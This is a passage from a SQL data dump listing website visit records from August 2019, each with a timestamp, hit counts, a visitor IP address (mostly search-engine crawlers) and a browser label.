,0,0,'144.76.60.198','other'),(442709,1565984644,4,4,0,0,'66.249.66.136','chrome'),(442710,1565985071,1,1,0,0,'66.249.66.138','chrome'),(442711,1565985229,1,1,0,0,'66.249.66.66','chrome'),(442712,1565985494,2,2,0,0,'66.249.66.134','chrome'),(442713,1565985962,1,1,0,0,'8.29.198.25','other'),(442714,1565986209,1,1,0,0,'207.46.13.176','other'),(442715,1565986218,1,1,0,0,'66.249.66.136','chrome'),(442716,1565986548,1,1,0,0,'66.249.66.134','chrome'),(442717,1565986862,1,1,0,0,'66.249.66.138','chrome'),(442718,1565987501,1,1,0,0,'66.249.66.134','chrome'),(442719,1565987555,1,1,0,0,'66.249.66.66','chrome'),(442720,1565987849,3,3,0,0,'157.55.39.113','other'),(442721,1565988070,1,1,0,0,'8.29.198.26','other'),(442722,1565988081,1,1,0,0,'66.249.66.136','chrome'),(442723,1565988166,1,1,0,0,'207.46.13.176','other'),(442724,1565988857,1,1,0,0,'207.46.13.190','other'),(442725,1565989481,3,3,0,0,'66.249.66.136','chrome'),(442726,1565989570,1,1,0,0,'66.249.66.138','chrome'),(442727,1565990108,1,1,0,0,'207.46.13.176','other'),(442728,1565990840,2,2,0,0,'66.249.66.134','chrome'),(442729,1565991013,2,2,0,0,'66.249.66.136','chrome'),(442730,1565992016,1,1,0,0,'66.249.66.134','chrome'),(442731,1565993102,3,3,0,0,'66.249.66.138','chrome'),(442732,1565993303,1,1,0,0,'157.55.39.127','other'),(442733,1565993336,1,1,0,0,'66.249.66.134','chrome'),(442734,1565993483,1,1,0,0,'66.249.66.136','chrome'),(442735,1565993597,1,1,0,0,'66.249.66.66','chrome'),(442736,1565994619,2,2,0,0,'66.249.66.138','chrome'),(442737,1565994673,1,1,0,0,'207.46.13.174','other'),(442738,1565995114,1,1,0,0,'66.249.66.136','chrome'),(442739,1565995231,1,1,0,0,'66.249.66.64','chrome'),(442740,1565995298,2,2,0,0,'66.249.66.134','chrome'),(442741,1565996425,1,1,0,0,'207.46.13.233','other'),(442742,1565996483,2,2,0,0,'66.249.66.136','chrome'),(442743,1565996587,2,2,0,0,'66.249.66.134','chrome'),(442744,1565996804,1,1,0,0,'8.29.198.25','other'),(442745,1565997476,2,2,0,0,'157.55.39.10','other'),(442746,1565997557,2,2,0,0,'66.249.66.138','chrome'),(442747,1565998060,1,1,0,0,'207.46.13.59','other'),(442748,1565998798,5,5,0,0,'66.249.66.134','chrome'),(442749,1565998915,1,1,0,0,'8.29.198.27','other'),(442750,1565999080,1,1,0,0,'66.249.66.138','chrome'),(442751,1565999225,2,2,0,0,'157.55.39.127','other'),(442752,1565999230,1,1,0,0,'207.46.13.59','other'),(442753,1565999249,1,1,0,0,'207.46.13.233','other'),(442754,1565999438,1,1,0,0,'65.155.30.101','msie'),(442755,1565999469,1,1,0,0,'66.249.66.136','chrome'),(442756,1566000756,1,1,0,0,'66.249.66.138','chrome'),(442757,1566000774,1,1,0,0,'207.46.13.59','other'),(442758,1566000953,4,4,0,0,'66.249.66.134','chrome'),(442759,1566000994,1,1,0,0,'207.46.13.233','other'),(442760,1566001043,2,2,0,0,'66.249.66.136','chrome'),(442761,1566001091,1,1,0,0,'66.249.66.64','chrome'),(442762,1566001147,1,1,0,0,'66.249.66.66','chrome'),(442763,1566002132,2,2,0,0,'66.249.66.134','chrome'),(442764,1566002195,2,2,0,0,'66.249.66.136','chrome'),(442765,1566003008,1,1,0,0,'141.8.188.29','other'),(442766,1566003021,1,1,0,0,'66.249.66.68','chrome'),(442767,1566003099,5,5,0,0,'66.249.66.134','chrome'),(442768,1566003129,1,1,0,0,'66.249.66.136','chrome'),(442769,1566003195,2,2,0,0,'66.249.66.138','chrome'),(442770,1566003653,1,1,0,0,'40.77.167.57','other'),(442771,1566003906,2,2,0,0,'157.55.39.127','other'),(442772,1566004371,3,3,0,0,'66.249.66.134','chrome'),(442773,1566005021,1,1,0,0,'66.249.66.66','chrome'),(442774,1566005467,1,1,0,0,'66.249.66.134','chrome'),(442775,1566005775,3,3,0,0,'157.55.39.127','other'),(442776,1566005852,1,1,0,0,'66.249.66.68','chrome'),(442777,1566005873,1,1,0,0,'207.46.13.59','other'),(442778,1566006096,2,2,0,0,'66.249.66.138','chrome'),(442779,1566006595,2,2,0,0,'66.249.66.136','chrome'),(442780,1566006628,1,1,0,0,'66.249.66.134','chrome'),(442781,1566007017,2,2,0,0,'141.8.188.11','other'),(442782,1566007066,1,1,0,0,'66.249.66.68','chrome'),(442783,1566007114,1,1,0,0,'207.46.13.127','other'),(442784,1566007239,1,1,0,0,'157.55.39.127','other'),(442785,1566007650,2,2,0,0,'66.249.66.134','chrome'),(442786,1566007658,1,1,0,0,'8.29.198.25','other'),(442787,1566007724,4,4,0,0,'66.249.66.136','chrome'),(442788,1566007729,1,1,0,0,'37.204.193.88','msie'),(442789,1566007877,1,1,0,0,'141.8.188.29','other'),(442790,1566008008,1,1,0,0,'66.249.66.64','chrome'),(442791,1566008057,1,1,0,0,'207.46.13.173','other'),(442792,1566008462,1,1,0,0,'207.46.13.59','other'),(442793,1566008944,2,2,0,0,'66.249.66.68','chrome'),(442794,1566008946,1,1,0,0,'141.8.188.11','other'),(442795,1566009056,1,1,0,0,'66.249.66.66','chrome'),(442796,1566009453,2,2,0,0,'66.249.66.138','chrome'),(442797,1566009758,1,1,0,0,'8.29.198.25','other'),(442798,1566010104,1,1,0,0,'66.249.66.134','chrome'),(442799,1566010347,2,2,0,0,'207.46.13.37','other'),(442800,1566010476,2,2,0,0,'66.249.66.136','chrome'),(442801,1566010845,2,2,0,0,'66.249.66.138','chrome'),(442802,1566011510,1,1,0,0,'66.249.66.134','chrome'),(442803,1566011616,1,1,0,0,'66.249.66.136','chrome'),(442804,1566011790,1,1,0,0,'207.46.13.59','other'),(442805,1566011879,1,1,0,0,'141.8.188.29','other'),(442806,1566012402,1,1,0,0,'207.46.13.173','other'),(442807,1566012852,2,2,0,0,'66.249.66.136','chrome'),(442808,1566012965,1,1,0,0,'207.46.13.37','other'),(442809,1566013145,1,1,0,0,'66.249.66.138','chrome'),(442810,1566013175,2,2,0,0,'66.249.66.134','chrome'),(442811,1566014268,3,3,0,0,'66.249.66.68','chrome'),(442812,1566014273,1,1,0,0,'66.249.66.134','chrome'),(442813,1566014341,1,1,0,0,'141.8.188.29','other'),(442814,1566014406,1,1,0,0,'207.46.13.59','other'),(442815,1566014512,2,2,0,0,'207.46.13.173','other'),(442816,1566014683,3,3,0,0,'66.249.66.138','chrome'),(442817,1566014835,3,3,0,0,'66.249.66.136','chrome'),(442818,1566015258,2,2,0,0,'66.249.66.134','chrome'),(442819,1566016194,1,1,0,0,'66.249.66.134','chrome'),(442820,1566016238,1,1,0,0,'66.249.66.136','chrome'),(442821,1566017411,1,1,0,0,'66.249.66.138','chrome'),(442822,1566017521,1,1,0,0,'66.249.66.66','chrome'),(442823,1566017652,2,2,0,0,'66.249.66.136','chrome'),(442824,1566018054,1,1,0,0,'207.46.13.59','other'),(442825,1566018493,1,1,0,0,'8.29.198.27','other'),(442826,1566018689,3,3,0,0,'66.249.66.134','chrome'),(442827,1566018757,3,3,0,0,'66.249.66.138','chrome'),(442828,1566018966,2,2,0,0,'141.8.188.29','other'),(442829,1566019011,2,2,0,0,'66.249.66.136','chrome'),(442830,1566019091,1,1,0,0,'178.80.17.174','firefox'),(442831,1566019167,1,1,0,0,'207.46.13.37','other'),(442832,1566019602,1,1,0,0,'66.249.66.134','chrome'),(442833,1566020064,2,2,0,0,'66.249.66.138','chrome'),(442834,1566020595,1,1,0,0,'8.29.198.27','other'),(442835,1566020688,1,1,0,0,'66.249.66.134','chrome'),(442836,1566020953,1,1,0,0,'137.226.113.26','other'),(442837,1566021080,1,1,0,0,'66.249.66.68','chrome'),(442838,1566021129,2,2,0,0,'157.55.39.8','other'),(442839,1566021398,1,1,0,0,'192.42.116.16','other'),(442840,1566022126,1,1,0,0,'66.249.66.68','chrome'),(442841,1566022247,1,1,0,0,'66.249.66.136','chrome'),(442842,1566022335,1,1,0,0,'66.249.66.64','chrome'),(442843,1566023176,1,1,0,0,'141.8.188.11','other'),(442844,1566023313,4,4,0,0,'66.249.66.134','chrome'),(442845,1566023374,1,1,0,0,'66.249.66.138','chrome'),(442846,1566023641,1,1,0,0,'157.55.39.225','other'),(442847,1566024688,3,3,0,0,'66.249.66.134','chrome'),(442848,1566025209,1,1,0,0,'157.55.39.8','other'),(442849,1566025260,1,1,0,0,'66.249.66.66','chrome'),(442850,1566025667,3,3,0,0,'66.249.66.134','chrome'),(442851,1566025854,2,2,0,0,'66.249.66.64','chrome'),(442852,1566025952,2,2,0,0,'141.8.188.11','other'),(442853,1566025982,3,3,0,0,'66.249.66.136','chrome'),(442854,1566026250,2,2,0,0,'66.249.66.68','chrome'),(442855,1566026575,2,2,0,0,'207.46.13.149','other'),(442856,1566026577,1,1,0,0,'141.8.188.29','other'),(442857,1566026580,1,1,0,0,'207.46.13.69','other'),(442858,1566026671,1,1,0,0,'66.249.66.138','chrome'),(442859,1566026735,1,1,0,0,'66.249.66.134','chrome'),(442860,1566027046,2,2,0,0,'91.209.11.236','other'),(442861,1566028391,1,1,0,0,'40.77.167.104','other'),(442862,1566028684,2,2,0,0,'5.45.207.79','other'),(442863,1566029155,2,2,0,0,'66.249.66.138','chrome'),(442864,1566029265,1,1,0,0,'207.46.13.149','other'),(442865,1566029329,1,1,0,0,'8.29.198.27','other'),(442866,1566029526,1,1,0,0,'66.249.66.136','chrome'),(442867,1566029613,1,1,0,0,'141.8.188.11','other'),(442868,1566030061,1,1,0,0,'40.77.167.104','other'),(442869,1566030338,1,1,0,0,'180.76.15.162','other'),(442870,1566030448,1,1,0,0,'66.249.66.68','chrome'),(442871,1566030841,2,2,0,0,'66.249.66.134','chrome'),(442872,1566031230,1,1,0,0,'66.249.66.136','chrome'),(442873,1566031354,2,2,0,0,'66.249.66.138','chrome'),(442874,1566031433,1,1,0,0,'8.29.198.27','other'),(442875,1566031713,1,1,0,0,'141.8.188.29','other'),(442876,1566031744,1,1,0,0,'40.77.167.104','other'),(442877,1566031972,1,1,0,0,'13.66.139.0','other'),(442878,1566032054,1,1,0,0,'91.209.11.236','other'),(442879,1566032238,1,1,0,0,'66.249.66.134','chrome'),(442880,1566032338,1,1,0,0,'180.76.15.134','other'),(442881,1566032609,1,1,0,0,'66.249.66.138','chrome'),(442882,1566033049,2,2,0,0,'66.249.66.64','chrome'),(442883,1566033167,1,1,0,0,'66.249.66.66','chrome'),(442884,1566033602,1,1,0,0,'66.249.66.136','chrome'),(442885,1566034267,1,1,0,0,'69.171.251.32','chrome'),(442886,1566035294,2,2,0,0,'66.249.66.136','chrome'),(442887,1566036269,1,1,0,0,'207.46.13.149','other'),(442888,1566036317,1,1,0,0,'66.249.66.136','chrome'),(442889,1566036739,1,1,0,0,'66.249.66.66','chrome'),(442890,1566036968,1,1,0,0,'109.74.154.72','chrome'),(442891,1566037706,1,1,0,0,'66.249.66.138','chrome'),(442892,1566037977,1,1,0,0,'209.17.96.242','other'),(442893,1566038568,1,1,0,0,'66.249.66.68','chrome'),(442894,1566038573,1,1,0,0,'157.55.39.104','other'),(442895,1566038724,1,1,0,0,'66.249.66.134','chrome'),(442896,1566039074,1,1,0,0,'130.180.220.184','chrome'),(442897,1566039343,1,1,0,0,'40.77.167.18','other'),(442898,1566039592,1,1,0,0,'66.249.66.136','chrome'),(442899,1566039770,1,1,0,0,'66.249.66.66','chrome'),(442900,1566039971,1,1,0,0,'141.8.188.29','other'),(442901,1566040020,1,1,0,0,'95.108.213.4','other'),(442902,1566040177,1,1,0,0,'8.29.198.26','other'),(442903,1566040319,1,1,0,0,'66.249.64.31','chrome'),(442904,1566040895,1,1,0,0,'66.249.66.136','chrome'),(442905,1566041178,1,1,0,0,'207.46.13.51','other'),(442906,1566042099,2,2,0,0,'157.55.39.68','other'),(442907,1566042155,2,2,0,0,'66.249.66.64','chrome'),(442908,1566042275,1,1,0,0,'8.29.198.27','other'),(442909,1566042448,2,2,0,0,'66.249.66.66','chrome'),(442910,1566043092,1,1,0,0,'66.249.66.68','chrome'),(442911,1566043120,1,1,0,0,'87.250.224.65','other'),(442912,1566043248,2,2,0,0,'66.249.66.64','chrome'),(442913,1566043787,1,1,0,0,'66.249.66.134','chrome'),(442914,1566044319,1,1,0,0,'5.45.207.8','other'),(442915,1566044730,1,1,0,0,'207.46.13.31','other'),(442916,1566044826,1,1,0,0,'37.239.134.20','firefox'),(442917,1566044967,2,2,0,0,'66.249.66.136','chrome'),(442918,1566045254,1,1,0,0,'66.249.66.138','chrome'),(442919,1566045553,1,1,0,0,'141.8.188.49','other'),(442920,1566046466,1,1,0,0,'66.249.66.64','chrome'),(442921,1566046755,2,2,0,0,'66.249.66.138','chrome'),(442922,1566046957,1,1,0,0,'46.211.102.93','chrome'),(442923,1566047035,3,3,0,0,'66.249.66.134','chrome'),(442924,1566047503,1,1,0,0,'66.249.66.136','chrome'),(442925,1566048279,1,1,0,0,'40.77.167.64','other'),(442926,1566048654,2,2,0,0,'66.249.66.136','chrome'),(442927,1566048696,1,1,0,0,'66.249.66.66','chrome'),(442928,1566049234,1,1,0,0,'207.46.13.72','other'),(442929,1566049806,1,1,0,0,'66.249.66.138','chrome'),(442930,1566050540,1,1,0,0,'66.249.66.134','chrome'),(442931,1566050663,1,1,0,0,'178.154.200.48','other'),(442932,1566050726,1,1,0,0,'66.249.66.136','chrome'),(442933,1566051039,1,1,0,0,'8.29.198.26','other'),(442934,1566051187,1,1,0,0,'141.8.188.29','other'),(442935,1566051258,2,2,0,0,'66.249.66.68','chrome'),(442936,1566052426,1,1,0,0,'157.55.39.68','other'),(442937,1566052881,2,2,0,0,'157.55.39.234','other'),(442938,1566053015,1,1,0,0,'193.106.30.99','chrome'),(442939,1566053132,1,1,0,0,'8.29.198.25','other'),(442940,1566054128,1,1,0,0,'66.249.66.134','chrome'),(442941,1566054353,2,2,0,0,'157.55.39.121','other'),(442942,1566054801,1,1,0,0,'141.8.188.11','other'),(442943,1566054908,1,1,0,0,'207.46.13.116','other'),(442944,1566055429,1,1,0,0,'66.249.66.136','chrome'),(442945,1566055677,1,1,0,0,'178.133.172.104','chrome'),(442946,1566056123,1,1,0,0,'66.249.66.64','chrome'),(442947,1566056223,1,1,0,0,'141.8.188.29','other'),(442948,1566056522,1,1,0,0,'87.250.224.64','other'),(442949,1566056541,1,1,0,0,'51.68.152.26','chrome'),(442950,1566056609,2,2,0,0,'66.249.66.66','chrome'),(442951,1566057695,1,1,0,0,'40.77.167.129','other'),(442952,1566057752,1,1,0,0,'5.45.207.19','other'),(442953,1566057848,2,2,0,0,'66.249.66.138','chrome'),(442954,1566057917,1,1,0,0,'141.8.188.29','other'),(442955,1566057961,1,1,0,0,'40.77.167.88','other'),(442956,1566058447,2,2,0,0,'207.46.13.76','other'),(442957,1566058792,1,1,0,0,'141.8.188.11','other'),(442958,1566059423,1,1,0,0,'91.196.178.97','chrome'),(442959,1566059626,2,2,0,0,'207.46.13.64','other'),(442960,1566060027,1,1,0,0,'5.45.207.19','other'),(442961,1566061590,1,1,0,0,'66.249.66.138','chrome'),(442962,1566061609,1,1,0,0,'95.216.18.217','chrome'),(442963,1566061773,1,1,0,0,'141.8.188.11','other'),(442964,1566061879,1,1,0,0,'8.29.198.26','other'),(442965,1566062080,1,1,0,0,'13.66.139.0','other'),(442966,1566062400,1,1,0,0,'66.249.66.64','chrome'),(442967,1566062440,1,1,0,0,'95.108.181.96','other'),(442968,1566063323,1,1,0,0,'157.55.39.51','other'),(442969,1566063612,1,1,0,0,'66.249.66.134','chrome'),(442970,1566063794,1,1,0,0,'141.8.188.11','other'),(442971,1566063906,2,2,0,0,'66.249.66.136','chrome'),(442972,1566063977,1,1,0,0,'8.29.198.27','other'),(442973,1566064246,1,1,0,0,'157.55.39.35','other'),(442974,1566064622,1,1,0,0,'66.249.66.138','chrome'),(442975,1566065352,2,2,0,0,'188.166.116.151','chrome'),(442976,1566066048,1,1,0,0,'66.249.66.66','chrome'),(442977,1566066429,3,3,0,0,'141.8.188.29','other'),(442978,1566066433,1,1,0,0,'141.8.188.11','other'),(442979,1566068048,1,1,0,0,'66.249.66.138','chrome'),(442980,1566068102,2,2,0,0,'66.249.66.68','chrome'),(442981,1566068195,2,2,0,0,'157.55.39.51','other'),(442982,1566069876,1,1,0,0,'66.249.66.64','chrome'),(442983,1566069944,1,1,0,0,'207.46.13.64','other'),(442984,1566070268,2,2,0,0,'66.249.66.68','chrome'),(442985,1566070287,1,1,0,0,'66.249.66.136','chrome'),(442986,1566070547,1,1,0,0,'95.108.213.4','other'),(442987,1566072619,2,2,0,0,'66.249.66.136','chrome'),(442988,1566072717,1,1,0,0,'8.29.198.26','other'),(442989,1566073537,2,2,0,0,'141.8.188.11','other'),(442990,1566073541,1,1,0,0,'5.45.207.79','other'),(442991,1566073566,1,1,0,0,'66.249.66.138','chrome'),(442992,1566074823,1,1,0,0,'8.29.198.27','other'),(442993,1566075199,1,1,0,0,'95.108.213.4','other'),(442994,1566075222,1,1,0,0,'66.249.66.64','chrome'),(442995,1566076130,1,1,0,0,'66.249.66.134','chrome'),(442996,1566076672,2,2,0,0,'66.249.66.138','chrome'),(442997,1566077147,1,1,0,0,'141.8.188.11','other'),(442998,1566077384,1,1,0,0,'40.77.167.40','other'),(442999,1566077755,1,1,0,0,'66.249.66.136','chrome'),(443000,1566077975,1,1,0,0,'66.249.66.138','chrome'),(443001,1566078805,2,2,0,0,'66.249.66.64','chrome'),(443002,1566079147,2,2,0,0,'141.8.188.11','other'),(443003,1566079396,1,1,0,0,'66.249.66.66','chrome'),(443004,1566079743,1,1,0,0,'193.106.30.99','chrome'),(443005,1566079809,3,3,0,0,'66.249.66.136','chrome'),(443006,1566080189,1,1,0,0,'141.8.188.29','other'),(443007,1566080740,2,2,0,0,'66.249.66.134','chrome'),(443008,1566082114,1,1,0,0,'157.55.39.61','other'),(443009,1566082709,1,1,0,0,'182.248.150.2','other'),(443010,1566082889,2,2,0,0,'66.249.66.136','chrome'),(443011,1566083207,2,2,0,0,'141.8.188.29','other'),(443012,1566083559,1,1,0,0,'8.29.198.26','other'),(443013,1566083639,1,1,0,0,'157.55.39.61','other'),(443014,1566083862,3,3,0,0,'66.249.66.134','chrome'),(443015,1566083923,1,1,0,0,'13.66.139.0','other'),(443016,1566084433,1,1,0,0,'141.8.188.29','other'),(443017,1566084551,1,1,0,0,'40.77.167.117','other'),(443018,1566085364,1,1,0,0,'66.249.66.68','chrome'),(443019,1566085612,2,2,0,0,'66.249.66.136','chrome'),(443020,1566085659,1,1,0,0,'8.29.198.27','other'),(443021,1566085686,1,1,0,0,'40.77.167.117','other'),(443022,1566086004,2,2,0,0,'141.8.188.29','other'),(443023,1566086731,3,3,0,0,'66.249.66.138','chrome'),(443024,1566086737,1,1,0,0,'207.46.13.73','other'),(443025,1566086934,1,1,0,0,'66.249.66.64','chrome'),(443026,1566087154,1,1,0,0,'66.249.66.136','chrome'),(443027,1566087426,1,1,0,0,'141.8.188.29','other'),(443028,1566087896,1,1,0,0,'66.249.66.138','chrome'),(443029,1566088099,1,1,0,0,'66.249.66.66','chrome'),(443030,1566088637,1,1,0,0,'157.55.39.61','other'),(443031,1566088815,1,1,0,0,'40.77.167.6','other'),(443032,1566089271,1,1,0,0,'66.249.66.138','chrome'),(443033,1566089780,1,1,0,0,'66.249.66.134','chrome'),(443034,1566090599,1,1,0,0,'66.249.66.138','chrome'),(443035,1566092178,1,1,0,0,'66.249.66.136','chrome'),(443036,1566092763,2,2,0,0,'66.249.66.66','chrome'),(443037,1566093208,1,1,0,0,'66.249.66.136','chrome'),(443038,1566093437,1,1,0,0,'66.249.66.134','chrome'),(443039,1566093595,1,1,0,0,'66.249.66.138','chrome'),(443040,1566093633,1,1,0,0,'157.55.39.61','other'),(443041,1566093670,1,1,0,0,'13.66.139.0','other'),(443042,1566094397,1,1,0,0,'8.29.198.26','other'),(443043,1566095154,1,1,0,0,'49.235.198.166','other'),(443044,1566095183,1,1,0,0,'66.249.66.68','chrome'),(443045,1566095731,2,2,0,0,'40.77.167.6','other'),(443046,1566095736,1,1,0,0,'207.46.13.34','other'),(443047,1566096503,1,1,0,0,'8.29.198.26','other'),(443048,1566096799,1,1,0,0,'207.46.13.73','other'),(443049,1566096896,1,1,0,0,'66.249.66.136','chrome'),(443050,1566097045,1,1,0,0,'66.249.66.68','chrome'),(443051,1566098673,1,1,0,0,'207.46.13.220','other'),(443052,1566099913,1,1,0,0,'66.249.66.134','chrome'),(443053,1566100111,1,1,0,0,'207.46.13.116','other'),(443054,1566100539,1,1,0,0,'66.249.66.64','chrome'),(443055,1566101407,2,2,0,0,'66.249.66.136','chrome'),(443056,1566101639,1,1,0,0,'66.249.66.64','chrome'),(443057,1566103018,1,1,0,0,'66.249.66.66','chrome'),(443058,1566104704,1,1,0,0,'66.249.66.66','chrome'),(443059,1566104788,1,1,0,0,'207.46.13.220','other'),(443060,1566104906,2,2,0,0,'66.249.66.138','chrome'),(443061,1566105086,1,1,0,0,'91.196.178.131','firefox'),(443062,1566105236,1,1,0,0,'8.29.198.27','other'),(443063,1566105481,2,2,0,0,'66.249.66.134','chrome'),(443064,1566106090,1,1,0,0,'66.249.66.136','chrome'),(443065,1566106861,2,2,0,0,'66.249.66.138','chrome'),(443066,1566107096,1,1,0,0,'5.2.67.138','other'),(443067,1566107241,2,2,0,0,'66.249.66.134','chrome'),(443068,1566107343,1,1,0,0,'8.29.198.26','other'),(443069,1566107778,1,1,0,0,'66.249.66.138','chrome'),(443070,1566108045,1,1,0,0,'66.249.66.136','chrome'),(443071,1566108765,1,1,0,0,'66.249.66.68','chrome'),(443072,1566108982,1,1,0,0,'66.249.66.66','chrome'),(443073,1566109127,1,1,0,0,'66.249.66.134','chrome'),(443074,1566109938,1,1,0,0,'66.249.66.66','chrome'),(443075,1566110021,2,2,0,0,'66.249.66.136','chrome'),(443076,1566110817,1,1,0,0,'66.249.66.134','chrome'),(443077,1566110833,1,1,0,0,'66.249.66.64','chrome'),(443078,1566110938,2,2,0,0,'207.46.13.220','other'),(443079,1566110949,1,1,0,0,'207.46.13.96','other'),(443080,1566112219,2,2,0,0,'207.46.13.96','other'),(443081,1566112801,1,1,0,0,'66.249.66.66','chrome'),(443082,1566113063,4,4,0,0,'40.77.167.129','other'),(443083,1566113897,1,1,0,0,'207.46.13.220','other'),(443084,1566113932,2,2,0,0,'66.249.66.138','chrome'),(443085,1566114257,1,1,0,0,'66.249.66.136','chrome'),(443086,1566114764,1,1,0,0,'66.249.66.134','chrome'),(443087,1566115491,1,1,0,0,'66.249.66.138','chrome'),(443088,1566116076,1,1,0,0,'8.29.198.25','other'),(443089,1566116140,2,2,0,0,'66.249.66.136','chrome'),(443090,1566116754,1,1,0,0,'66.249.66.138','chrome'),(443091,1566117548,1,1,0,0,'40.77.167.129','other'),(443092,1566118206,1,1,0,0,'8.29.198.25','other'),(443093,1566118328,1,1,0,0,'66.249.66.136','chrome'),(443094,1566118927,2,2,0,0,'66.249.66.134','chrome'),(443095,1566119590,1,1,0,0,'66.249.66.138','chrome'),(443096,1566119766,1,1,0,0,'66.249.66.68','chrome'),(443097,1566120537,1,1,0,0,'66.249.66.136','chrome'),(443098,1566120769,1,1,0,0,'66.249.66.138','chrome'),(443099,1566120978,1,1,0,0,'66.249.66.134','chrome'),(443100,1566122893,1,1,0,0,'109.74.154.72','chrome'),(443101,1566123514,1,1,0,0,'207.46.13.220','other'),(443102,1566123668,1,1,0,0,'66.249.66.138','chrome'),(443103,1566124020,1,1,0,0,'157.55.39.58','other'),(443104,1566124151,1,1,0,0,'58.250.125.100','other'),(443105,1566125083,1,1,0,0,'66.249.66.68','chrome'),(443106,1566125312,1,1,0,0,'157.55.39.58','other'),(443107,1566125559,2,2,0,0,'66.249.66.136','chrome'),(443108,1566126555,1,1,0,0,'66.249.66.134','chrome'),(443109,1566126928,1,1,0,0,'8.29.198.25','other'),(443110,1566127100,2,2,0,0,'66.249.66.136','chrome'),(443111,1566127337,1,1,0,0,'66.249.66.68','chrome'),(443112,1566128915,1,1,0,0,'66.249.66.134','chrome'),(443113,1566129016,1,1,0,0,'188.244.34.199','msie'),(443114,1566129060,1,1,0,0,'8.29.198.25','other'),(443115,1566129302,1,1,0,0,'184.94.240.92','firefox'),(443116,1566129506,1,1,0,0,'157.55.39.58','other'),(443117,1566129511,1,1,0,0,'185.242.87.42','chrome'),(443118,1566130834,1,1,0,0,'40.77.167.181','other'),(443119,1566130965,1,1,0,0,'207.46.13.162','other'),(443120,1566132276,2,2,0,0,'66.249.66.64','chrome'),(443121,1566132368,1,1,0,0,'66.249.66.136','chrome'),(443122,1566132869,1,1,0,0,'66.249.66.68','chrome'),(443123,1566132887,1,1,0,0,'40.77.167.181','other'),(443124,1566133013,1,1,0,0,'157.55.39.68','other'),(443125,1566133449,1,1,0,0,'77.121.38.147','chrome'),(443126,1566133956,2,2,0,0,'207.46.13.162','other'),(443127,1566135216,1,1,0,0,'157.55.39.58','other'),(443128,1566136122,1,1,0,0,'207.46.13.162','other'),(443129,1566136176,56,56,0,0,'66.249.66.134','chrome'),(443130,1566136470,1,1,0,0,'66.249.66.64','chrome'),(443131,1566136539,3,3,0,0,'66.249.66.138','chrome'),(443132,1566136542,6,6,0,0,'66.249.66.136','chrome'),(443133,1566136905,1,1,0,0,'157.55.39.68','other'),(443134,1566137662,2,2,0,0,'66.249.66.64','chrome'),(443135,1566137749,2,2,0,0,'66.249.66.138','chrome'),(443136,1566137767,1,1,0,0,'8.29.198.26','other'),(443137,1566137984,1,1,0,0,'66.249.66.136','chrome'),(443138,1566138344,3,3,0,0,'66.249.66.134','chrome'),(443139,1566138966,1,1,0,0,'66.249.66.138','chrome'),(443140,1566139417,1,1,0,0,'66.249.66.68','chrome'),(443141,1566139420,1,1,0,0,'157.55.39.96','other'),(443142,1566139906,1,1,0,0,'8.29.198.25','other'),(443143,1566140046,1,1,0,0,'66.249.66.134','chrome'),(443144,1566140623,1,1,0,0,'207.46.13.162','other'),(443145,1566141452,1,1,0,0,'66.249.66.136','chrome'),(443146,1566142102,2,2,0,0,'66.249.66.134','chrome'),(443147,1566142548,1,1,0,0,'66.249.66.138','chrome'),(443148,1566142674,1,1,0,0,'207.46.13.162','other'),(443149,1566143881,1,1,0,0,'66.249.66.66','chrome'),(443150,1566143906,3,3,0,0,'66.249.66.134','chrome'),(443151,1566145003,1,1,0,0,'207.46.13.144','other'),(443152,1566145107,1,1,0,0,'66.249.66.64','chrome'),(443153,1566145365,1,1,0,0,'66.249.66.136','chrome'),(443154,1566147950,1,1,0,0,'157.55.39.58','other'),(443155,1566148084,2,2,0,0,'157.55.39.208','other'),(443156,1566148167,1,1,0,0,'66.249.66.138','chrome'),(443157,1566148608,1,1,0,0,'8.29.198.25','other'),(443158,1566148709,1,1,0,0,'46.4.88.156','chrome'),(443159,1566148754,1,1,0,0,'188.163.117.10','chrome'),(443160,1566148979,1,1,0,0,'66.249.66.64','chrome'),(443161,1566149037,1,1,0,0,'173.212.233.72','chrome'),(443162,1566149805,1,1,0,0,'157.55.39.180','other'),(443163,1566150342,1,1,0,0,'40.77.167.149','other'),(443164,1566150467,1,1,0,0,'40.77.167.23','other'),(443165,1566150749,1,1,0,0,'8.29.198.27','other'),(443166,1566150832,1,1,0,0,'94.180.198.128','msie'),(443167,1566152591,1,1,0,0,'46.211.103.141','chrome'),(443168,1566152846,1,1,0,0,'128.124.172.190','chrome'),(443169,1566153547,2,2,0,0,'66.249.66.138','chrome'),(443170,1566153790,1,1,0,0,'40.77.167.149','other'),(443171,1566154016,1,1,0,0,'66.249.66.64','chrome'),(443172,1566154369,1,1,0,0,'66.249.66.68','chrome'),(443173,1566154373,1,1,0,0,'66.249.66.134','chrome'),(443174,1566154787,1,1,0,0,'207.46.13.46','other'),(443175,1566155114,1,1,0,0,'66.249.66.136','chrome'),(443176,1566156555,2,2,0,0,'66.249.66.134','chrome'),(443177,1566156887,1,1,0,0,'157.55.39.11','other'),(443178,1566156937,2,2,0,0,'66.249.66.136','chrome'),(443179,1566157917,1,1,0,0,'207.46.13.46','other'),(443180,1566158061,2,2,0,0,'40.77.167.81','other'),(443181,1566158194,1,1,0,0,'66.249.66.136','chrome'),(443182,1566158450,2,2,0,0,'66.249.66.138','chrome'),(443183,1566158954,1,1,0,0,'66.249.66.134','chrome'),(443184,1566159452,1,1,0,0,'8.29.198.26','other'),(443185,1566159841,1,1,0,0,'66.249.66.66','chrome'),(443186,1566159976,1,1,0,0,'157.55.39.11','other'),(443187,1566160293,1,1,0,0,'66.249.66.136','chrome'),(443188,1566160706,1,1,0,0,'66.249.66.68','chrome'),(443189,1566160729,1,1,0,0,'66.249.66.64','chrome'),(443190,1566161592,1,1,0,0,'8.29.198.25','other'),(443191,1566161830,1,1,0,0,'66.249.66.136','chrome'),(443192,1566161938,1,1,0,0,'40.77.167.81','other'),(443193,1566162686,2,2,0,0,'66.249.66.134','chrome'),(443194,1566163218,1,1,0,0,'66.249.66.138','chrome'),(443195,1566163583,3,3,0,0,'66.249.66.136','chrome'),(443196,1566164191,2,2,0,0,'40.77.167.81','other'),(443197,1566164665,1,1,0,0,'207.46.13.176','other'),(443198,1566165022,1,1,0,0,'157.55.39.234','other'),(443199,1566165137,2,2,0,0,'66.249.66.138','chrome'),(443200,1566166118,1,1,0,0,'66.249.66.138','chrome'),(443201,1566166397,1,1,0,0,'66.249.66.64','chrome'),(443202,1566167180,2,2,0,0,'66.249.66.134','chrome'),(443203,1566167353,1,1,0,0,'40.77.167.50','other'),(443204,1566167943,1,1,0,0,'66.249.66.138','chrome'),(443205,1566168087,1,1,0,0,'207.46